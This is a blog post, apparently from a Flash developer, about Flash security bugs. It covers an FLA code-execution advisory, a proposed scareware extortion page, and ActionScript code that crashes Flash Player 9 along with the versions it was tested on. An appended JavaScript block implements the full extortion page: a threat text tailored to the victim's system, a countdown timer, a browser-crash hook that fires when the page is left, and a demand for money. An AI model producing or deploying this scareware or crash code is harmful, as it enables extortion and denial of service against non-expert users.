Security flaws in FLA files

FLA is one of those file formats that we are used to opening freely, without any fear. That confidence should change now that a new exploit has been found: an attacker can craft an FLA file so that, when it is loaded into the Flash CS3 or Flash 8 IDE, it executes arbitrary code on our machine.

No need to panic: it is unlikely that many malicious FLA files are floating around. Just don't open any untrusted FLA file in the IDE until Adobe issues a fix.

More info

Technical info

Social Engineering Exploits using Flash

Apparently Adobe has fixed the bug I found that enables an SWF file to crash the browser, with the latest version of the Flash Player (9,0,115,0). I don't know if it's related to my post, but anyway it's good that it's been fixed.

Since it's already fixed, I just want to give an example of how this could have been exploited with a little social engineering. This example might look stupid to you and you would never have fallen for it, but remember: first, it's only an idea, and the real attacker might be more creative; second, some Internet users are far from savvy and might fall for crazier stuff than this.

In this example, the naive user will reach a web site with this text: “I’ve installed a virus on your windows machine and now have full control of it and your FireFox browser. You have exactly 1:00 minute to donate 10$ to my account, click here to donate. If you fail to donate in the appropriate time I will disable your browser for a few minutes. This will be your first and last warning. Afterwards you have exactly 10 minutes to return to this page and complete your donation or your system and personal data will be compromised and damaged permanently. The only way you can remove the virus from your machine is to donate from this page”.

The OS and browser details would be substituted with the real user's specs. The user sees a 1:00 timer counting down; when it reaches 0:00, boom! the browser crashes via the Flash bug. If the user tries to close the browser or the tab, JavaScript's onbeforeunload can be used to crash the browser and also add a scary alert.

[js]window.onbeforeunload = function()
{
//flash.kill(); // trigger the crashing SWF here
return "If you leave this page without donating your system will be lost!!!";
}[/js]
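As an added example that is not part of the original post, here is the whole scare page described above written in JavaScript, structured so that each piece can be exercised outside a browser. The crashHost placeholder, the element id "threat", and the user-agent parsing are assumptions made for illustration; the post only says that the text is tailored to the victim and that the Flash bug is fired when the timer ends or when the page is about to unload.

```javascript
// Added example (not from the original post). crashHost() stands in for
// whatever actually crashes the browser (the post's Flash bug); in this
// file it only records that it was called.

// Pull a rough OS/browser label out of a user-agent string so the threat
// text matches what the victim actually runs (assumed heuristic).
function describeClient(userAgent) {
  const os =
    /Windows/.test(userAgent) ? "Windows" :
    /Mac OS X|Macintosh/.test(userAgent) ? "Mac" :
    /Linux/.test(userAgent) ? "Linux" : "computer";
  const browser =
    /Firefox\//.test(userAgent) ? "Firefox" :
    /MSIE |Trident\//.test(userAgent) ? "Internet Explorer" :
    /Chrome\//.test(userAgent) ? "Chrome" :
    /Safari\//.test(userAgent) ? "Safari" : "browser";
  return { os, browser };
}

// The scare text, personalised and carrying the current countdown value.
function buildThreatText(userAgent, secondsLeft) {
  const { os, browser } = describeClient(userAgent);
  const mm = Math.floor(secondsLeft / 60);
  const ss = String(secondsLeft % 60).padStart(2, "0");
  return "I've installed a virus on your " + os + " machine and now have full " +
    "control of it and your " + browser + " browser. You have exactly " +
    mm + ":" + ss + " to donate 10$ to my account.";
}

// One-second countdown. The scheduler is injected (setTimeout in the
// browser) so the countdown can be stepped deterministically in a test.
function createCountdown(seconds, onTick, onExpire, schedule) {
  let remaining = seconds;
  let expired = false;
  function step() {
    remaining -= 1;
    onTick(remaining);
    if (remaining <= 0) {
      expired = true;
      onExpire();           // 0:00 reached: fire the crash
    } else {
      schedule(step, 1000);
    }
  }
  schedule(step, 1000);
  return {
    get remaining() { return remaining; },
    get expired() { return expired; },
  };
}

// beforeunload handler: fires the crash again and returns the scary text.
// Caveat: current browsers ignore the returned string and show their own
// generic "leave page?" prompt; only older browsers displayed it verbatim.
function makeBeforeUnloadHandler(crashHost) {
  const msg = "If you leave this page without donating your system will be lost!!!";
  return function onBeforeUnload(event) {
    crashHost();
    if (event) event.returnValue = msg;
    return msg;
  };
}

// Browser wiring; skipped when run under Node. Element id "threat" is assumed.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  const crashHost = function () { /* load the crashing SWF here */ };
  const el = document.getElementById("threat");
  el.textContent = buildThreatText(navigator.userAgent, 60);
  createCountdown(
    60,
    function (s) { el.textContent = buildThreatText(navigator.userAgent, s); },
    crashHost,
    setTimeout
  );
  window.onbeforeunload = makeBeforeUnloadHandler(crashHost);
}
```

The scheduler injection is what makes the timer testable; in the page it is simply setTimeout.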

Some users will have enough fear in them to go back and donate to the attacker's PayPal account. Sounds crazy?! Some have been known to fall for crazier phishing tricks. I personally know a few. Take care of the dummies near you.

Too much focus will kill you

I've just come across a way to kill the Flash player with a few lines of AS 2.0. I know of at least one other way of killing the Flash player along with its host, be it the browser or the Flash IDE, but that was with the old 7th player; this time we're talking about the latest 9th version. It's a little awkward, and don't ask me how I got it, but it involves a MovieClip, a TextField, Selection, Macromedia's Delegate, a filter, and a trace; yeah, it won't work without a call to trace. I think the main troublemaker is Selection.onSetFocus, but I couldn't recreate it without any of the above ingredients, and I have a feeling that AS2's trace is also problematic in Flash Player 9. (You should anyway "Omit trace actions", from the publish settings, when publishing SWFs.)

Focus Kills

I haven't tried it, but I doubt that it can be recreated with AS3 on the VM2; it's the VM1 that we have to carry along for backward compatibility that causes all this trouble. I tested it on several different machines with different Flash players and so far it crashed them all; here is the list:

Ver: WIN 8,0,22,0 | Debug: true | OS: Windows XP
Ver: WIN 9,0,16,0 | Debug: true | OS: Windows XP
Ver: WIN 9,0,28,0 | Debug: false | OS: Windows XP
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows XP
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows (Server 2003)
Ver: WIN 9,0,45,0 | Debug: true | OS: Windows Vista
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows Vista
Ver: WIN 9,0,47,0 | Debug: false | OS: Windows Vista
Ver: MAC 9,0,28,0 | Debug: false | OS: Mac OS 10.4.9

Copy this code into the first frame of an empty FLA, or download the source below, to see how it goes.

// Empty clip that will receive a filter once the text field gains focus.
var mc:MovieClip = this.createEmptyMovieClip("mc", 0);

// Input text field; clicking it or tabbing into it moves focus and starts the loop.
var tf:TextField = this.createTextField("tf", 1, 20, 20, 300, 100);
tf.type = "input";
tf.border = true;
tf.text = "Flash Player Version: " + System.capabilities.version + "\nDebug Player: " + System.capabilities.isDebugger + "\nOperating System: " + System.capabilities.os + "\n\nClick here or press the TAB key to kill Flash";

// The field's own focus handler is routed through Delegate to glow() on the timeline.
tf.onSetFocus = mx.utils.Delegate.create(this, glow);

// The timeline also listens for global focus changes via Selection.
Selection.addListener(this);

// Every time focus moves, push it back to the previous object.
function onSetFocus(oldf:Object, newf:Object):Void{
Selection.setFocus(oldf);
}

// Assigning a filter and tracing it while the focus is being bounced is what brings the player down.
function glow(){
mc.filters = [new flash.filters.BevelFilter()]; // any filter except BitmapFilter()
trace(mc.filters); // the crash does not reproduce without this trace
}

Download source files.

Try it (Warning!!! It may crash your browser)